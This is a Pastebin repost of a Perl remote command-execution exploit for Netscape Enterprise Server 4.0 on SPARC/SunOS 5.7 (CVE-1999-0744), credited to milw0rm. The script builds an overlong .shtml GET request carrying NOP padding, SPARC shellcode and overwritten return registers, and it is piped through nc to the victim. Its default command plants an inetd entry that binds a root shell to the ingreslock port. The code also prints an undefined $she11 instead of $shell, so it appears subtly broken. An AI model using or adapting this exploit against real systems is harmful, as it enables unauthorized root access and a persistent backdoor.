Advertisement
FlyFar

Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Command Execution - CVE-1999-0744

Feb 24th, 2024
1,197
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.61 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2.  
  3. #
  4. # Remote sploit for Netscape Enterprise Server 4.0/sparc/SunOS 5.7
  5. # usage: ns-shtml.pl ['command line'] | nc victim port
  6. #
  7. # Sometimes server may hang or coredump.. eek ;-)
  8. # fyodor@relaygroup.com
  9.  
  10. $cmdline="echo 'ingreslock stream tcp nowait root /bin/sh sh -i' > /tmp/bob; /usr/sbin/inetd -s /tmp/bob";
  11. $cmdline=$ARGV[0] if $ARGV[0];
  12.  
  13.  
  14. $nop='%80%1b%c0%1f';
  15. $strlen=0x54 + length($cmdline);
  16. $cmdline=~ s/ /%20/g; # encode bad characters..
  17. $strlen=sprintf "%%%x", $strlen;
  18.  
  19. $shell=
  20. '%20%bf%ff%ff' .#  start:   bn,a <start-4>            ! super-dooper trick to get current address ;')
  21. '%20%bf%ff%ff' .#  boom:    bn,a  <start>
  22. '%7f%ff%ff%ff' .#       call boom
  23. '%90%03%e0%48' .#       add %o7, binksh - boom, %o0       ! put binksh address into %o0
  24. '%92%03%e0%38' .#       add %o7, argz - boom, %o1         ! put address of argz array into %o1
  25. '%a0%03%e0%51' .#       add %o7, minusc - boom, %l0       ! put address of -c argument into %l0
  26. '%a2%03%e0%54' .#       add %o7, cmdline - boom, %l1      ! put address of command line argument into %l1
  27. '%c0%2b%e0%50' .#       stb %g0, [ %o7 + minusc-boom-1 ]  ! put ending zero byte at the end of /bin/sh
  28. '%c0%2b%e0%53' .#       stb %g0, [ %o7 + cmdline-boom-1 ] ! put ending zero byte at the end of -c
  29. '%c0%2b%e0' . $strlen .#        stb %g0, [ %o7 + endmark-boom-1 ] ! put ending zero byte at the end of command line
  30. '%d0%23%e0%38' .#       st %o0, [ %o7 + argz-boom ]       ! store pointer to ksh into 0 element of argz
  31. '%e0%23%e0%3c' .#       st %l0, [ %o7 + argz-boom+4 ]     ! store pointer to -c into 1 element of argz
  32. '%e2%23%e0%40' .#       st %l1, [ %o7 + argz-boom+8 ]     ! store pointer to cmdline into 2 element of argz
  33. '%c0%23%e0%44' .#       st %g0, [ %o7 + argz-boom+12 ]    ! store NULL pointer at the end
  34. '%82%10%20%0b' .#       mov 0xb, %g1
  35. '%91%d0%20%08' .#       ta 8
  36. '%ff%ff%ff%ff'.  # 40   argz: 0xffffffff;
  37. '%ff%ff%ff%ff'.   # 44        0xffffffff;
  38. '%ff%ff%ff%ff'.   # 48        0xffffffff;
  39. '%ff%ff%ff%ff'.   # 52        0xffffffff;
  40. '/bin/kshA' .     # 56  binksh: "/bin/kshA";
  41. '-cA' . $cmdline . 'A'; # cmdline: "blahblahA";
  42.  
  43. ##################################################
  44. # Generate huge GET /..<shellcode>...shtml here  #
  45. ##################################################
  46. $padd=814-length($shell);
  47. print STDERR "pad is $padd\n";
  48.  
  49. print "GET /";
  50.  
  51. print $nop x 40;
  52. print $she11;
  53. print "A"x $padd;
  54.  
  55. print "\xfd\xe7%dc\x80"; # %i0
  56. print "AAAA"; # %i1
  57. print "AAAA"; # %i2
  58. print "AAAA"; # %i3
  59. print "AAAA"; # %i4
  60. print "AAAA"; # %i5
  61. print '%fd%c3%16%58'; #%fp (%i6)
  62. print '%ff%21%d7%ac'; # %i7
  63. print "A"x1200;
  64.  
  65. print ".shtml HTTP/1.0\n\n";
  66.  
  67.  
  68. # milw0rm.com [2001-01-27]
  69.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement